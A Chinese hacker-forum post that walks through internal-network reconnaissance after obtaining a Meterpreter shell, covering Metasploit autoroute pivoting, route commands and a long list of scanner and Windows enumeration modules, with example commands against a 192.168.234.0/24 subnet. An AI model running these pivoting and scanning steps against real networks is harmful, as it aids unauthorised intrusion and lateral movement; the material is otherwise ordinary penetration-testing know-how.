跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

路由转发

在我们成功拿到meterpreter的shell之后,想要探测内网的信息,这时候我们就要用到路由转发了。

大致的意思就是,利用msf添加一条通向内网的路由,我们利用这条添加的路由,去扫描内网的信息,发现存活的主机。如果不加路由的话,我们是无法扫描内网信息的。

内网渗透的本质就是信息搜集。

利用命令run get_local_subnets,获取目标机器的网段。

70ac8f3c02f3007.png 我们得到了网段,接下来就添加路由。

利用命令run autoroute -s 192.168.234.0/24,添加路由

利用命令run autoroute -p,打印路由

8376bf36047b875.png

当然,查找网段和添加路由不止以上的方法。做一下拓展……

获取网端还可以利用命令ipconfigroute list

添加路由呢,我们还可以使用route add 192.168.234.0/24 255.255.255.0 1(ip+子网掩码+session)。

 

主机发现

对于主机的发现,Micro8大佬总结的很好,于是我来复现归纳一下。

setg rhosts 192.168.234.0/24,在msf中使用setg命令,全局设置一下需要扫描的目标机器。(这样的做的目的是提高效率,就不用再重复填写目标机器了。)

总结一下可利用的模块:

  • auxiliary/scanner/discovery/arp_sweep
  • auxiliary/scanner/discovery/udp_sweep
  • auxiliary/scanner/ftp/ftp_version
  • auxiliary/scanner/http/http_version
  • auxiliary/scanner/smb/smb_version

  • auxiliary/scanner/ssh/ssh_version
  • auxiliary/scanner/telnet/telnet_version
  • auxiliary/scanner/discovery/udp_probe
  • auxiliary/scanner/dns/dns_amp
  • auxiliary/scanner/mysql/mysql_version

  • auxiliary/scanner/netbios/nbname
  • auxiliary/scanner/http/title
  • auxiliary/scanner/db2/db2_version
  • auxiliary/scanner/portscan/ack
  • auxiliary/scanner/portscan/tcp

  • auxiliary/scanner/portscan/syn
  • auxiliary/scanner/portscan/ftpbounce
  • auxiliary/scanner/portscan/xmas
  • auxiliary/scanner/rdp/rdp_scanner
  • auxiliary/scanner/smtp/smtp_version

  • auxiliary/scanner/pop3/pop3_version
  • auxiliary/scanner/postgres/postgres_version
  • auxiliary/scanner/ftp/anonymous
  • db_nmap

  • windows/gather/arp_scanner
  • windows/gather/enum_ad_computers
  • windows/gather/enum_computers
  • windows/gather/enum_domain
  • windows/gather/enum_domains
  • windows/gather/enum_ad_user_comments

上述模块用法用法大体相似就不一一列举,以后遇到特殊情况再补充。

以其中的auxiliary/scanner/ssh/ssh_version,写一下用法

先将当前会话运行到后台

use auxiliary/scanner/ssh/ssh_version

set rhosts 192.168.234.0/24,设置目标机器

set threads 10,设置线程

exploit

6217cb6c3ffee9b.png

我们之所以能够在msf下进行扫描,是因为我们做了路由转发

但是,经过我的实验,这些扫描模块最好用的就是基于arp的模块,为了更加方便,还可以直接在meterpreter使用如下命令

run arp_scanner -r 192.168.234.0/24

2f31b3bdf3d5eed.png

基于arp进行探测,虽说方便快捷,但是也很容易被对方发现。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。